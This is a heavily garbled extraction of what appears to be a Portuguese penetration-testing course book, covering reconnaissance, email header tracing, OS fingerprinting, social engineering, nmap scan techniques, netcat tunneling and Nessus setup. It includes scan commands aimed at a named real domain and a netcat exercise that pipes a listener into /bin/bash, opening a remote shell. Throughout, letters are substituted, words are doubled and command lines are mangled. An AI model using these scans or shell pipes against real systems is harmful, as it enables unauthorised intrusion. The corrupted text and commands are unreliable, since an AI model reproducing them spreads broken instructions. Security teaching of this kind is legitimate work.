linu4"com")r$ro)ots"t4t : a'&e =e.g. A"m<. )( st*'esheet to transform 3( o&tp&t to +3( -*[0-6]: )et timing temp'ate =higher is faster<
$ortantoE os arquivos robots.t
-!2! ,et.rat 'etraft uma empresa europia que prove serviços de internet. -entro de
Capítulo 5 e#antaento de Inforaç.e" - 61
alguns serviços que ela fornee est3 a an3lise de merado para empresas de Geb osting e servidores GebE inluindo deteção do sistema operaional e versão do servidor GebE e em alguns asosE informaç%es sobre uptime do servidorE j3 que normalmente esse fator determinante na esola de uma empresa de ospedagem de sites. $ara n7sE pode ser Qtil para e
-!! Hus.ando rela.ionamentos 4travs de relaionamentos enontrados na GebE podemos onseguir mais informaç%es de nosso alvo. Informaç%es de relaionamentos podem ser enontradas em site om lin:s para o site do alvoE sites seund3rios que tem relação om o site prinipal do alvoE ompanias que faDem neg7ios ou estão sob a mesma administração que nosso alvo e et. ;ssas servem para entendermos melor omo a organiDação trabalaE se possui outros ramos de atividadesE organiDaç%es XirmãsY e parerias. Com tais informaç%es em mãosE e um melor oneimento da estrutura organiDaionalE podemosE inlusiveE realiDar ataques de engenaria soial mais efiaDes. O 9oogle nos fornee alguns operadores que nos au
info
●
lin:
●
related
Capítulo 5 e#antaento de Inforaç.e" - 62 #ttp:$$%%%"unmas¶sites"com$
-!10! Pr/ti.a dirigida @amos realiDar algumas onsultasW 4 partir do site GGG.#linu<.om.br onsiga o m3
●
8ois ? retornar3 o resultado da onsulta à entidade respons3vel pelos registros de domínioE no nosso aso o registro.br. Conseguiremos nome dos respons3veisE telefoneE C$F ou C'$PE endereçoE e,mail e et.
●
-ig ? onseguiremos informaç%es sobre os servidores onde o domínio est3 ospedado. eremos o endereço do servidor de domínio e de e, mailE por e
●
'sloo:up ? retornar3 o I$ do domínio e o nome do mesmoE inluindo a porta a partir da qual o servidor est3 respondendo no aso do -'SE a padrão a ("J.
●
%%%"netcraft"com ? permite que saibamos qual sistema operaional o
servidor est3 e
%%%"Bpeople"com ? esse site não busa informaç%es sobre domínioE
mas sobre pessoas. 'a onsulta om o Gois obtivemos alguns nomesE e nesse site podemos onsultar as referVnias na Geb aera desse nome notíiasE artigosE postagens relevantesJ.
Capítulo 5 e#antaento de Inforaç.e" - 63
Com ada um desses omandos e sitesE onseguiremos algumas informaç%es diferentesE que nos ajudarão na pr7
-!11! Rastreamento de 7Dmails 4 an3lise de e,mails normalmente feita pela 3rea de Forense Computaional. $ormE podemos usar um e,mail para obter informaç%es sobre o ost da pessoaE quando esse não de oneimento do ataante e preisa ser desobertoE pois um possível alvo. O orreio eletr\nio dividido em duas partes? Cabeçalo >eaderJ e Corpo +odAJ do e,mail. 'o abeçalo onde enontramos diversos ampos om informaç%es de ontroleE destinat3rioE remetenteE data de envioE dentre outras informaç%es. ; no orpo da mensagem que enontramos a mensagemE em si. -e aordo om a Bf 221 & 222 E temos os seguintes ampos presentes no abeçalo de um e,mail? Campos de origem? ●
XFrom?Y , autor da mensagem
●
XSender?Y , remetente da mensagem
●
XBeplA,to?Y , e,mail sugerido pelo autor da mensagem para que as respostas sejam enviadas
Campos de destino? ●
Xo?Y , endereço dos reeptores prim3rios da mensagem
●
XC?Y , Carbon CopA reeberão uma 7pia da mensagemE om o e, mail visível para todos
●
X+?Y , +lind Carbon CopA reeberão uma 7pia da mensagemE sem ter o e,mail visível para todos
Campo de data de origem?
Capítulo 5 e#antaento de Inforaç.e" - 64 ●
X-ate?Y >ora da riação da mensagem
Campos de identifiação? ●
X6essage,I-?Y Identifiador de mensagem Qnio. @alor Qnio determinado pelo servidor que transmite a mensagem
●
XIn,BeplA,o?Y Hsado quando uma mensagem respondida. Identifiador da mensagem respondida
●
XBeferenes?Y Hsado quando uma mensagem respondida. BeferVnias.
Campos de informação? ●
XSubjet?Y 4ssunto da mensagem
●
XComments?Y Coment3rios sobre a mensagem
●
XeAGords?Y $alavras aves relaionadas à mensagem
Campos de Bastreamento? ●
XBeturn,$at?Y Camino de volta da mensagem para o remetente. ;sse ampo adiionado pelo Qltimo 64 que entrega o e,mail ao destinat3rio
●
XBeeived?Y Contm informaç%es para ajudar na an3lise de problemas om a entrega e reebimento das mensagens. odo e,mail possui pelo menos um ampo XBeeivedYE que adiionado por ada servidor onde a mensagem passa.
O ampo que interessa a n7s o ampo XBeeived?YE que ontm informaç%es sobre o endereço I$ de onde a mensagem de orreio eletr\nio partiu.
@amos ver um e
Capítulo 5 e#antaento de Inforaç.e" - 65 Teste de cabeçalho de e-mail Sexta-feira, 7 de Maio de 2010 11:56 From Li! "ieira Fri Ma# 7 1$:56:10 2010 %-&''are(tl#-To: lo)i*br+#ahoocombr ia 671.5/1.0 Fri, 07 Ma# 2010 07:56:6 -0700 etr(-3ath: 4li!t+mailcom %-8Mail9S: ;22=>L;S52hi1(2?*M@ot#A/f=)'#6)LAB"%e0o.d/!Ci*@!3'.l/sxD=FECoSD=Acm'?D<29=l06 Dt'ms;oC(8of$Ca)F"dx8*m8!2%xcIr1#cra1=0/l d1tMTdaF2f7)G10D&dxm1#728>%3lL/$c2%%0&D8>E3o&67l"69)L?%T/f?7&e!"r7;@3b9?e1fi("% mH;FsmHic&x5'h2060
'a do abeçalo sublina e em negritoE enontramos o I$ de quem enviou essa mensagemE no aso o I$ 1*.1(1..1# . 'o abeçalo podemos enontrar v3rios ampos BeeivedE pois por ada servidor de e,mail que a mensagem passa adiionado um novo ampo. $ormE o endereço de quem enviou a mensagem vai apareer no ampo Beeived mais bai
Capítulo 5 e#antaento de Inforaç.e" - 66
-!1%! Aingerprint Fingerprint uma das prinipais tnias de levantamento de informação footprintJ que realiDada por um $en,ester antes que o mesmo omee a realiDar os ataques em seu alvo. 4 função dessa tnia identifiar a versão e distribuição do sistema operaional que ir3 reeber a tentativa de intrusão. Sendo assimE essa tnia e
●
●
4nalise de paotes que trafegam pela rede /eitura de banners assinaturas do sistemaJ 4n3lise de partiularidades da pila C$&I$.
$ara realiDar tais an3lisesE podemos utiliDar ferramentas espeífiasE oneidas omo sanners de fingerprintE que são softGares usados para realiDar
Capítulo 5 e#antaento de Inforaç.e" - 67
tarefas de deteção de sistemas operaionais. ;ntre os sanners e
5.12.1. 9in#er$rin" $assio O sanner atua omo um XfarejadorY na redeE ou sejaE fia esutando os paotes que passam por elaE detetando o formato do paote que esta passando onsegue identifiar o sistema operaional. $ara esse tipo de operaçãoE utiliDamos a ferramenta p*fE que permite XfarejarmosY os paotes que trafegam na rede. =p0f -i et#0 -o log
Com o parUmetro ,i definimos em qual dispositivo de rede ele fiar3 farejando os paotesE se não definimos nadaE ele assume XallYE farejando todos os dispositivos disponíveis. Com o parUmetro ,oE diDemos para o p*f armaDenar tudo o que for apturado em um arquivo de saídaE om nome definido por n7s.
5.12.2. 9in#er$rin" a"io O sanner envia paotes manipulados e forjadosE baseado em uma tabela pr7pria de fingerprint. Com issoE ele analisa a resposta do paote e ompara om a tabelaE para definir qual o sistema operaional. O riso desse tipo de fingerprintE que se o alvo estiver om um fireGall bem onfigurado e um I-S&I$SE nosso aesso pode ser logado em seu sistema e pode ser difíil que onsigamos muitas informaç%es. -uas ferramentas que podemos utiliDar em um fingerprint ativo são nmap e
Capítulo 5 e#antaento de Inforaç.e" - 68
5.12.3. Des!o%rino '( Sis"e(a O$era!ional 'sano IC*P Hm simples ping apaD de revelar o sistema operaional de uma m3quina. = ping %%%">linu4"com")r -c IN %%%">linu4"com")r FF"8">B">J !F8>J )
4 informação importante est3 no ampo / ime o /iveJ. 4 maioria dos sistemas operaionais se diferenia pelo valor retornado de /. @eja a lista abai
CAlades , 'ormalmente "*
●
/inu< , 'ormalmente 0#
●
8indoGs , 'ormalmente 12
●
Ciso , 'ormalmente 2((
●
/inu< ] iptables , 'ormalmente 2((
5.12.4. Cal!'lano :OP HtiliDando os omandos traeroute e ping onjugados para obter informaç%esE podemos alular o ttl e desobrir o sistema operaional do alvo. = traceroute %%%">linu4"com")r traceroute to %%%">linu4"com")r FF"8">B">J, 0 #ops ma4, F0 )
Capítulo 5 e#antaento de Inforaç.e" - 69 8 )orderB"tge--))net"acs00B"pnap"net F>"A>"0"AJ E!"!0 ms EF"8! ms EE"BAE ms A sagonet-B")orderB"acs00B"pnap"net E0">B"80"!0J !"F8 ms !">0B ms F"BA8 ms 0 ve>0"core0a"tpa"sagonet"net F"B>F"!A">J >F"!B ms >F"!E> ms >F"!!E ms gige"ds0a"tpa"sagonet"net F!"0"B"0J >E"!A0 ms >E"E8 ms >8"FF! ms B
Com o traeroute podemos ver que temos 11 saltosE at que os paotes são interrompidosE o que pode representar um fireGall ou algo do tipo que desarte os paotes. 4gora que sabemos por quantos roteadores estamos passandoE podemos usar o omando ping para desobrir o / do site. = ping %%%">linu4"com")r -c IN %%%">linu4"com")r FF"8">B">J !F8>J )
Somando a quantidade de saltos 11J om o valor de ttl #5JE temos 0*. O mais pr7
5.12.5. 9in#er$rin" a"ra;s o $ro%e2 Ferramenta para fingerprint ativo apresentada na onferenia +la:>at /as, @egas em 2**1 riada por FAodor riador da ferramenta nmap e Ofir 4r:in o, fundador do projeto oneAnet.org. Seu bano de dados de assinaturas fia em?
Capítulo 5 e#antaento de Inforaç.e" - 70 $usr$local$etc$4pro)eB$4pro)eB"conf
;
4gora tente utiliDar o fingerprint sobre uma porta aberta? = 4pro)eB -p tcp:80:open FF"8">B">
$erebe,se que quanto maior o nQmero de informaç%es que passamos para o
-!1)! Contramedidas ●
Configurar as apliaç%es instaladas nos servidoresE atentando para as informaç%es que elas e
●
Configurar orretamente as regras de fireGall para bloquear requisiç%es maliiosas.
●
er uidado om as informaç%es publiadas na 8;+.
●
Configurar orretamente o arquivo robot.t
-!14! Pr/ti.a dirigida 1. Faça uma varredura no servidor da #/inu< usando a ferramenta dnsenum. 2. Identifique na internet um arquivo robots.t
Capítulo 5 e#antaento de Inforaç.e" - 71
#. HtiliDando a ferramenta p*fE identifique o sistema operaional de m3quinas e
Capítulo 5 e#antaento de Inforaç.e" - 72
Capítulo 6 7ntendendo a 7ngenEaria So.ial e o ,oDTe.E ;a.
6!1! "#$etivos ●
;ntender o que ;ngenaria Soial
●
;ntender o -umpster -iving
●
;ntender os risos assoiados à ;ngenaria Soial
●
;ntender as tnias de 'o,e >a:ing
Capítulo 6 )ntendendo a )ngen/ar%a So&%al e o o-!e&/ 'a&(%ng - 73
6!%! " &ue ' 7ngenEaria So.ial( $odemos onsiderar a engenaria soial omo a arte de enganar pessoas para onseguir informaç%esE as quais não deviam ter aesso. 6uitas veDes empregados de uma empresa dei
6!)! Tipos de 7ngenEaria So.ial 6.3.1. Baseaa e( $essoas 4s tnias de engenaria soial baseada em pessoas possuem diversas araterístias que são utiliDadas para que o ataante onsiga as informaç%es que desejaE dentre elas podemos itar? ●
-isfares
●
Bepresentaç%es
●
Hso de argos de alto nível
●
●
4taques ao serviço de >elpdes: Observaç%es
6.3.2. Baseaa e( !o($'"aores ;sses ataques são arateriDados por utiliDarem tnias de ataque baseadas no desoneimento do usu3rio om relação ao uso orreto da inform3tia.
Capítulo 6 )ntendendo a )ngen/ar%a So&%al e o o-!e&/ 'a&(%ng - 74
;
Cavalos de r7ia ane
●
;,mails falsos
●
8ebSites falsos
6!4! Aormas de ata&ue 6.4.1. Insier &""a!/s Insiders são pessoas de dentro da pr7pria organiDação. O objetivos por detr3s dos ataques de insiders podem ser v3riosE desde desobrir quanto o olega do lado ganaE at onseguir aesso a informaç%es onfideniais de um projeto novo para vender ao onorrente de seu empregador.
6.4.2. o'%o e ien"iae 4tualmenteE quando algum ria uma nova identidade baseando,se em informaç%es de outra pessoaE essa identidade amada de XlaranjaY. -entro de empresasE o roubo de redeniaisE para aessar informaç%es que não estão aessíveis a todosE um fato orriqueiroE que pode passar pelo simples soulder surfing à lonagem de I- Card.
6.4.3. Pisin# S!a( = uma forma de fraude eletr\niaE arateriDada por tentativas de adquirir informaç%es sigilosasE ou instalar programas maliiosos na m3quina alvo. 'a pr3tia do $ising surgem artimanas ada veD mais sofistiadas para ZpesarZ do inglVs fisJ as informaç%es sigilosas dos usu3rios.
Capítulo 6 )ntendendo a )ngen/ar%a So&%al e o o-!e&/ 'a&(%ng - 75
6.4.4. <L O%f's!a"ion nia utiliDada para diminuir o tamano de HB/s muito grandes. ;
migre.me
●
o:m.me
●
digi.to
Isso pode ser utiliDado para oultar HB/ om parUmetros ou tags maliiososE omo tags de javasript para ataques de KSSE por e
6.4.5. D'($s"er Diin# = o ato de vasular li
6.4.6. Pers'as=o Os pr7prios a:ers vVem a engenaria soial de um ponto de vista psiol7gioE enfatiDando omo riar o ambiente psiol7gio perfeito para um ataque. Os mtodos b3sios de persuasão são? personifiaçãoE insinuaçãoE onformidadeE difusão de responsabilidade e a vela amiDade. Independente do mtodo usadoE o objetivo prinipal onvener a pessoa que dar3 a informaçãoE de que o engeneiro soial de fato uma pessoa a quem ela pode onfiar as informaç%es prestadas. Outro fator importante nuna pedir muita informação de uma s7 veD e sim perguntar aos pouos e para pessoas diferentesE a fim de manter a aparVnia de uma relação onfort3vel.
Capítulo 6 )ntendendo a )ngen/ar%a So&%al e o o-!e&/ 'a&(%ng - 76
6!-! 7ngenEaria So.ial Reversa Hm mtodo mais avançado de onseguir informaç%es ilíitas om a engenaria soial reversa. Isto oorre quando o ataante ria uma personalidade que aparee numa posição de autoridadeE de modo que todos os usu3rios le pedirão informação. Se pesquisadosE planejados e bem e
6!6! ,o Te.E ;a.
dumpster diving
Capítulo 6 )ntendendo a )ngen/ar%a So&%al e o o-!e&/ 'a&(%ng - 77 ●
soulder surfing
●
lo: pi:ing
●
tailgating
6!! Contramedidas ●
6antena protegidoE não trabale em assuntos privados em loais pQblios.
●
Faça o desarte seguro de doumentos.
●
HtiliDe feaduras e tranas de boa qualidade e omprovado nível de segurança.
●
6antena bolsas e doumentos pessoais em segurança.
●
este onstantemente seus dispositivos de segurançaE Umeras e detetores de movimento.
●
ena uidado om Soulder Surfers.
●
+loqueie o tailgating.
●
6antena,se atento aos engeneiros soiais.
●
-V treinamento adequado aos funion3riosE prinipalmente os da 3rea de segurança.
6!2! 78er.í.io te9ri.o ;labore abai
Capítulo 6 )ntendendo a )ngen/ar%a So&%al e o o-!e&/ 'a&(%ng 'a&(%ng - 78
__________________________________________________________________________ __________________________________________________________________________ __________________________________________________________________________ __________________________________________________________________________ __________________________________________________________________________ __________________________________________________________________________ __________________________________________________________________________ __________________________________________________________________________
Capítulo 7 arredura" at%#a" pa""%#a" e furt%#a" de rede - 79
Capítulo =arreduras ativasF passivas e urtivas de rede
!1! "#$etivos ●
6apear osts ativos na rede
●
Obter vers%es dos sistemas operaionais
●
;ntender aquisição de banners
●
Identifiar os serviços em e
Capítulo 7 arredura" at%#a" pa""%#a" e furt%#a" de rede - 80
!%! =arreduras =arreduras Internet Control 3essages Proto.ol IC3PJ O protoolo I$ Internet $rotoolJ oneido omo Yprotoolo do melor esforçoYE devido a sua araterístia de sempre prourar o melor amino at uma dete determ rmin inad ada a rede rede ou ost ost.. O I$ poss possui ui um fiel fiel esu esude deir iroE oE um am amad ado o IC6$ IC6$ Int Inter erne nett Cont Contro roll 6ess 6essag ages es $r $rot oto ool olJJ eE de aor aordo do om om a BFC) BFC)52 52 o IC6$ IC6$ empregado quando? ●
Ruando um paote não onsegue egar ao destino
●
Ruando um roteador não onsegue enaminar um paote
●
Ruando um roteador desobre uma rota mais urta para um destino
Ferramentas omo o ping e o traeroute utiliDam o protoolo de ontrole IC6$ para determinar se um ost est3 vivo na rede e para mapear os roteadores at um destinoE por e
O nmap tambm pode ser usado om a opção s$ =nmap Qs AB"F8"B00"0$B>
'o aso do nmapE se utiliDarmos a opção $ing San ,s$JE observamos que mesmo se uma m3quina estiver bloqueando paotes IC6$E ele poder3 list3,la omo ativaE pois ele tambm envia paotes C$ para algumas portasE omo por e
Capítulo 7 arredura" at%#a" pa""%#a" e furt%#a" de rede - 81
4ssimE onseguimos a lista de todos os omputadores que respondem ping na rede.
!)! =arreduras TCP ;nquanto que as varreduras IC6$ nos informam a quantidade de osts ativos em uma redeE as varreduras C$ nos informam o nQmero de portas abertas em um determinado omputador. $ara desobrir se uma porta esta aberta ou feadaE o program programa a amado amado port port sann sanner er manipu manipula la uma arat araterí erísti stia a do proto protoolo olo C C$ $E amada ree 8aA >andsa:eE desrita na BFC )5".
-e aordo om a imagemE o lienteE que deseja onetar,se a um servidorE envia um pedido de one<ãoE ou sejaE no abeçalo do datagrama C$ ontm uma flag do tipo YST'Y. O servidorE que est3 apto a atender novas requisiç%es responde então om um datagrama C$ ontendo uma flag do tipo YST'Y] Y4CY. O liente então responde om um datagrama ontendo um Y4CYE e então estabeleida a one<ão. -e aordo om a BFC )5"E que define os parUmetros para o protoolo C$E toda porta aberta deve responder om a flag YST']4CYE e toda porta feada deve responder om uma flag YBSY. $ara identifiar este omportamentoE vamos utiliDar a ferramenta lina de omando ping". @erifiando @erifiando o omportamento de um servidor om a porta * aberta.
Capítulo 7 arredura" at%#a" pa""%#a" e furt%#a" de rede - 82 = #ping --s
O mesmo omando agora em uma porta feada. = #ping --s
$ereba que as respostas sãoE S4E que representa um YST' ] 4CYE e um B4E que representa um YBeset ] 4CYE a resposta padrão para portas feadas.
!4! ,map 'map 'map pode pode ser ser ons onside iderad rada a uma uma das ferra ferrame ment ntas as mais mais ompl omplet etas as para para realiDar realiDar varreduras varreduras em redesE pois possui um nQmero nQmero imenso imenso de opç%esE opç%esE permitindo e
!-! 3'todos de =arredura 7.5.1. -sP $ing san? 4lgumas veDes neess3rio saber se um determinado ost ou rede est3 est3 no ar. ar. 'map 'map pode pode envia enviarr pao paote tess IC6$ IC6$ Xe Xeo o requ reques estY tY para para verif verifi iar ar se determinado ost ou rede est3 ativa. >oje em diaE e
Capítulo 7 arredura" at%#a" pa""%#a" e furt%#a" de rede - 83
defaultJ e aso reeba BS o alvo est3 ativo. 4 tereira tnia envia um paote ST' e espera um BS ou ST',4C.
7.5.2. -s @ersion detetion? 4p7s as portas C$ e&ou H-$ serem desobertas por algum dos mtodosE o nmap ir3 determinar qual o serviço est3 rodando atualmente. O arquivo nmap,servie,probes utiliDado para determinar tipos de protoolosE nome da apliaçãoE nQmero da versão e outros detales.
7.5.3. -sS C$ ST' san? nia tambm oneida omo Xalf,openYE pois não abre uma one<ão C$ ompleta. = enviado um paote ST'E omo se ele fosse uma one<ão real e aguarda uma resposta. Caso um paote ST',4C seja reebidoE a porta est3 abertaE enquanto que um BS,4C omo resposta india que a porta est3 feada. 4 vantagem dessa abordagem que pouos irão detetar esse sanning de portas.
7.5.4. -sT C$ onnetJ san? = a tnia mais b3sia de C$ sanning. = utiliDada a amada de sistema sAstem allJ XonnetJY que envia um sinal as portas ativas. Caso a porta esteja aberta reebe omo resposta XonnetJY. = um dos san mais r3pidosE porm f3il de ser detetado.
7.5.5. -s< H-$ san? ;ste mtodo utiliDado para determinar qual porta H-$ est3 aberta em um ost. 4 tnia onsiste em enviar um paote H-$ de * bAte para ada porta do ost. Se for reebida uma mensagem IC6$ Xport unreaableY então a porta est3 feadaE senão a porta pode estar aberta. $ara variar um pouoE a
Capítulo 7 arredura" at%#a" pa""%#a" e furt%#a" de rede - 84
6irosoft ignorou a sugestão da BFC e om isso a varredura de m3quinas 8indoGs muito r3pida.
7.5.6. -s9 -s> -sN Stealt8 FI7: ;mas Tree ou 7ull) 4lguns fireGalls e filtros de paotes detetam paotes ST's em portas restritasE então neess3rio utiliDar mtodos avançados para atravessar esses softGares. FI7? $ortas feadas enviam um paote BS omo resposta a paotes FI'E enquanto portas abertas ignoram esses paotes. ;sse mtodo não funiona om a plataforma 8indoGsE uma veD que a 6irosoft não seguiu BFC 5)"J ;mas Tree? $ortas feadas enviam um paote BS omo resposta a paotes FI'E enquanto portas abertas ignoram esses paotes. 4s flags FI'E HB9 e $HS> são utiliDados nos paotes FI' que enviado ao alvo. ;sse mtodo não funiona om a plataforma 8indoGsE uma veD que a 6irosoft não seguiu BFC 5)"J 7ull? $ortas feadas enviam um paote BS omo resposta a paotes FI'E enquanto portas abertas ignoram esses paotes. 'enuma flag ligada no paote FI'. ;sse mtodo não funiona om a plataforma 8indoGsE uma veD que a 6irosoft não seguiu BFC 5)"J
7.5.7. -T ?Paranoi@Snea/@Poli"e@Nor(al@#ressie@InsaneA ;sse parUmetro seta a prioridade de varredura do 'map? ●
'aranoid !-T<" muito lento na esperança de prevenir a deteção pelo sistema I-S. ;ste serialiDa todos os sans sanning não paraleloJ e geralmente espera no mínimo ( minutos entre o envio de paotes.
●
Snea=y !-T(" similar ao $aranoidE e<eto que somente espera 1( segundos entre o envio de paotes.
●
'olite !-T*" tem o signifiado para failitar a arga na rede e reduDir as anes de travar a m3quina. ;le serialiDa os testes e espera no mínimo
Capítulo 7 arredura" at%#a" pa""%#a" e furt%#a" de rede - 85
*.# segundos entre eles. ●
7ormal !-T+" o omportamento default do 'mapE o qual tenta e
●
Aggressi&e!-T," esse modo adiiona um timeout de ( minutos por ost e nuna espera mais que 1.2( segundos para testar as respostas.
●
Insane !-T/" somente adequando para redes muito r3pidas ou onde voV não se importa em perder algumas informaç%es. 'esta opção o timeout dos osts aontee em )( segundos e espera somente *." segundos por teste individual.
'p*+es Interessantes: -p tili6ado para especificar portas -' (ostra a vers3o do S"' -0 Desativa I?( tipo 8 e o T? /? na porta 80
!6! Pr/ti.a dirigida 7.6.1. *a$eano $or"as a%er"as e( '( serior =nmap -sT AB"F8"0"E
;sta varredura o omportamento padrão do 'map que utiliDado quando não temos privilgios de root ou em redes Ipv0. 'esta varreduraE o 'map utiliDa uma amada de sistema do tipo YonnetJYE e seu desempeno depende fortemente da implementação da pila C$&I$ feita no sistema operaional. Os resultados possíveis para esta varredura são? ●
Open&Filtered? 4berta e aeitando one<%es e&ou filtrada por fireGall
●
Closed&Filtered? $orta feada e&ou filtrada por fireGall
Capítulo 7 arredura" at%#a" pa""%#a" e furt%#a" de rede - 86
@arreduras baseadas em fim de one<ão? =nmap -sO AB"F8"0"E
;sta varredura e
Open&Filtered? 4berta e&ou filtrada por fireGall
●
Closed&Filtered? Feada e&ou filtrada por fireGall
@arredura 'ula? =nmap -sN AB"F8"0"E
4lguns sistemas operaionais que não seguem a BFC estritamente podem dar respostas diferentes do esperado. Sabendo deste omportamentoE podemos enviar um paote sem nenum onteQdo e então observar a resposta do alvo. 4s respostas podem variar de sistema operaional para sistema operaionalE mas geralmente reebemos? ●
Open&Filtered? 4berta e&ou filtrada por fireGall
●
Closed? Feada
@arredura para identifiação de fireGalls? =nmap -s/ AB"F8"0"E
O objetivo desta varredura mapear as regras de um fireGall para determinar se o mesmo faD tratamento ompleto de one<ão ou não.
Capítulo 7 arredura" at%#a" pa""%#a" e furt%#a" de rede - 87
Os Qnios resultados neste tipo de varredura são? ●
Filtered? 4 porta est3 protegida por fireGall
●
Hnfiltered? 4 porta não est3 protegida por fireGall
!! Tunelamento O tunelamentoE basiamenteE a tnia de enapsular onjuntos de dados que trafegam em rede dentro de outro onjunto de dadosE de forma que a rota que os primeiros iam tomar seja onduDida para um lugar ou de uma maneira que sem o enapsulamento eles não poderiam faDer.
;
$roteger dados atravs de uma one<ão riptografada não suportada loalmente
●
BealiDar uma one<ão ujo protoolo seria bloqueado não fosse o uso do tQnel
●
Conetar,se a um destino bloqueado para one<ão direta
●
Conetar,se a uma m3quina de rede interna omo se fosse de dentro para fora
●
6asaramento de I$.
;
Capítulo 7 arredura" at%#a" pa""%#a" e furt%#a" de rede - 88 ●
'etat anivete suíço C$&I$J
●
OpenSS> sell remoto&tQnel riptogr3fioJ
●
>ttptunnel tQnel ttp para atravessar fireGallsJ
●
Cor:sreG tunela SS> em ttp para atravessar fireGallsJ.
!2! Pr/ti.a dirigida 7.8.1. T'nelano !o( o Ne"!a"
4bra trVs terminais. 4 idia que um primeiro terminal vai esutar em uma porta de forma regularE um segundo vai abrir um tQnel de uma porta arbitr3ria at a porta em que o servidor do primeiro terminal estiver esutando e o tereiro terminal vai se onetarE tambm de maneira regularE à porta arbitr3ria do tunel que levar3 essa one<ão at a sua saída no serviço do primeiro terminal. ●
1 servidorJ? U nc -l -vv 0BF V $)in$)as#
●
2 tQnelJ ? U nc -l -vv 0B! V nc local#ost 0BF
●
" lienteJ? U nc local#ost 0B!
Capítulo 7 arredura" at%#a" pa""%#a" e furt%#a" de rede - 89
!! nonKmi>er Os programas de anonAmiDer funionam basiamente para oultar seus dados enquanto navega na internet. 'ormalmente a apliação utiliDada para isso um pro
ttp?&&GGG.torprojet.org&
$rivo
ttp?&&GGG.privo
Capítulo 7 arredura" at%#a" pa""%#a" e furt%#a" de rede - 90
!10! Pr/ti.a dirigida 7.10.1. Nae#ano anoni(a(en"e 4esse o site GGG.soGmAip.om e veja seu endereço I$ e o loal de onde est3 aessando. Instale o anon,pro
;ntre no navegador e onfigure o pro
!11! Contramedidas 6anter regras de fireGall bem onfiguradasE evitando que determinados tipos de varredura possam ser realiDadas. 'ão permitir que usu3rios na rede tenam aesso às onfiguraç%es do navegador para onfigurar pro
Capítulo 7 arredura" at%#a" pa""%#a" e furt%#a" de rede - 91
Capítulo 2 7numeração de inormaç*es e serviços
2!1! "#$etivos ●
6apear a rede
●
-esobrir serviços e vers%es sendo e
Capítulo 8 )nueração de %nforaç.e" e "er#%ço" - 92
2!%! 7numeração 4s tnias de enumeração são utiliDadas omo um omplemento às fases de fingerprint e varredura. O objetivo desobrir serviços e vers%es que estão sendo e
2!)! &uisição de #anners Falaremos agora a respeito da aptura de informaç%es sobre os serviços que estão rodando em uma m3quina,alvo por meio da leitura de seus respetivos banners que são aquelas mensagens que ontm informaç%es omo o tipo do serviçoE sua versãoE et. ;ssas informaç%es visam estabeleer um levantamento dos serviços utiliDadosE onde o foo de um possível ataque pode estar voltado para a e
8.3.1. T;!ni!as !lssi!as Sem utiliDar ferramentas espeífiasE possível onseguir informaç%es dos serviços que estão sendo e
Capítulo 8 )nueração de %nforaç.e" e "er#%ço" - 93 =ftp AB"F8"B00"B!>
Obtendo banner de um servidor de e,mail? =telnet AB"F8"B00"B0! B! ;@' WdomínioX (/I@ O9'(: Wendere*oKorigemX 9?T T': Wendere*oKdestinoX D/T/ """ msg """ J " quit
Com o omando telnetE podemos tentar onetar em todas as portas e
8.3.2. 9erra(en"as ●
'map BealiDa varredura de redeE busando osts ativosE portas abertas e serviços
sendo e
Kprobe2
4nalisa banners de sistemas operaionaisE omparando om um bano de dados internoE onde ompara,os e informa o S.O. utiliDado e a versão do mesmo. ●
4map 4naliDa banners de serviços que estão sendo e
Capítulo 8 )nueração de %nforaç.e" e "er#%ço" - 94
versão. ●
4utoSan
FaD varredura na rede e informa osts ativosE portas abertas e serviços sendo e
6altego
FaD varredura de redesE serviçosE protoolosE domínios e v3rias outras opç%esE informando de forma gr3fia a relação entres os osts ativos. ●
/anmap @arre toda a rede e aptura paotesE riando ao longo de sua e
arquivo .$'9 om o mapa da redeE informando grafiamente a relação das m3quinas enontradas. ●
Ceops @arre toda a rede em busa de osts ativosE informando grafiamenteE atravs
de um mapaE os osts ativosE S.O. sendo e
'essus
4travs de plugins espeífiosE varre um determinado alvoE informando as vulnerabilidades enontradasE inlusive e
2!4! Pr/ti.a dirigida 8.4.1. Ca$"'rano %anner e a$li!a)es e for(a a"ia 1 , 4 partir da sinta
Capítulo 8 )nueração de %nforaç.e" e "er#%ço" - 95 nmap -sY -' WipKalvoX Hpro)eB Qp T?:80:open ZipP /map ZipP ZportaP
2!-! 3apeando grai.amente a rede Os programas de lina de omando funionam muito bem para varrer redesE desobrir osts ativosE serviços sendo e
8.5.1. Lan(a$ e Ceo$s ; lanmap ,i et* ,r "* , png ,o &tmp&
Capítulo 8 )nueração de %nforaç.e" e "er#%ço" - 96
8.5.2. &'"oS!an
8.5.3. *al"e#o
Capítulo 8 )nueração de %nforaç.e" e "er#%ço" - 97
2!6! @es.o#rindo =ulnera#ilidades 8.6.1. Ness's 'essus uma das ferramentas mais oneidas para desoberta de vulnerabilidades em redes e sistemas. Com um onjunto sempre atualiDado de pluginsE baseado em sua linguagem de sript amada '4S/E ele faD a varredura de todo os I$s definidos em sua onfiguraçãoE busando vulnerabilidades e breas na onfiguração dos serviçosE informando,os em um relat7rio finalE onde define o grau de riso das vulnerabilidades enontradas. Iniialmente o 'essus era um softGare opensoureE mas a partir da versão ".* passou a ser uma ferramenta omerialE disponível gratuitamente apenas para uso domstio. $ortantoE possível bai
utiliDar a ferramenta em testes partiulares. @amos ver no t7pio a seguir omo bai
2!! Pr/ti.a dirigida 8.7.1. Ins"alano o Ness's 1.
4esse o endereço nessus.org&doGnload&
2.
+ai
Capítulo 8 )nueração de %nforaç.e" e "er#%ço" - 98
".
Instale o paote?
=dp&g -i Nessus->"B"B-de)ian!Ki8F"de)
#.
4diione um usu3rio que ser3 o administrador do 'essus?
=$opt$nessus$s)in$nessus-adduser
8.7.2. e#is"rano e ini!iano 1. 4esse GGG.nessus.org®ister 2. ;sola a versão $rofessional ou >ome a versão >ome gratuitaJ ". Informe um endereço de e,mail para onde eles enviarão o nQmero de registroJ =$opt$nessus$)in$nessus-fetc# --register 4444-4444-4444-4444 =$opt$nessus$s)in$nessus-update-plugins =$etc$init"d$nessusd start
#. 4esse em seu broGser? ttps?&&12).*.*.1?"#&
2!2! @einindo vetores de ata&ue = importanteE antes de iniiarmos qualquer ação efetiva ontra nosso alvoE definirmos as v3rias possibilidades de ataques e
Capítulo 8 )nueração de %nforaç.e" e "er#%ço" - 99
